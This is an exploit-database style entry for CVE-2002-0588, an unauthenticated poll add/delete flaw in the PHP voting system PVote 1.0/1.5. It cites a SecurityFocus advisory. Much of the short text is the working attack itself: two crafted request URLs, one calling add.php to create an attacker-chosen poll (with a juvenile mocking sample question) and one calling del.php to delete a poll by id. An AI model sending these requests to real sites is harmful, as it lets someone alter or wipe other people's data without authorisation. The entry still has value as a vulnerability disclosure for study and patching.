PVote 1.0/1.5 Poll Content Manipulation Vulnerability. CVE-2002-0588. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/4540/info PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems. It is possible for a remote attacker to add/delete web polls just by manipulating the values of URL parameters. ADD A POLL: http://target/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4 =bad where question refers to the topic of the topic to be added by the attack. DELETE A POLL: http://target/pvote/del.php?pollorder=1 where pollorder is the poll 'id' number for the poll to be deleted.